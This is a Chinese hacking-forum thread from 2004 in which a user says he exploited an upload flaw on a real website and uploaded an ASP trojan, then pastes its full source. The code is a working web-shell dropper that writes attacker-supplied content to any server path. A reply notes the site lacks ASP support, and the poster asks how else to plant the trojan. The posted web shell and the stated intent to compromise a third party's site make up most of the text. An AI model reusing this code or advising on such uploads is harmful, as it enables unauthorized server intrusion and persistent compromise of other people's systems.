|
 | 作者: Henung [henung]
 论坛用户 |
登录 |
| 我在某网站看到了一个上传的漏洞,然后把ASP木马上传上去了,但是显示的却是木马的代码,请指教 <% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <% on error resume next %> <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %> <% if Trim(request("syfdpath"))<>"" then %> <% fdata = request("cyfddata") %> <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %> <% objCountFile.Write fdata %> <% if err =0 then %> <% response.write "<font color=red>save Success!</font>" %> <% else %> <% response.write "<font color=red>Save UnSuccess!</font>" %> <% end if %> <% err.clear %> <% end if %> <% objCountFile.Close %> <% Set objCountFile=Nothing %> <% Set objFSO = Nothing %> <% Response.write "<form action='' method=post>" %> <% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %> <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %> <% Response.Write "<br>" %> <% Response.write "本文件绝对路径" %> <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %> <% Response.write "<br>" %> <% Response.write "输入马的内容:" %> <% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %> <% Response.write "<input type=submit value=保存>" %> <% Response.write "</form>" %> |
| 地主 发表时间: 04-10-01 14:04 |
 | 回复: programs [programs] 论坛用户 |
登录 |
|
对方不支持ASP |
| B1层 发表时间: 04-10-01 17:55 |
| 回复: Henung [henung] 论坛用户 |
登录 |
|
那怎么办才好呢?我应该怎么上传木马呢 |
| B2层 发表时间: 04-10-01 20:35 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 有谁遇见过这样的上传漏洞问题?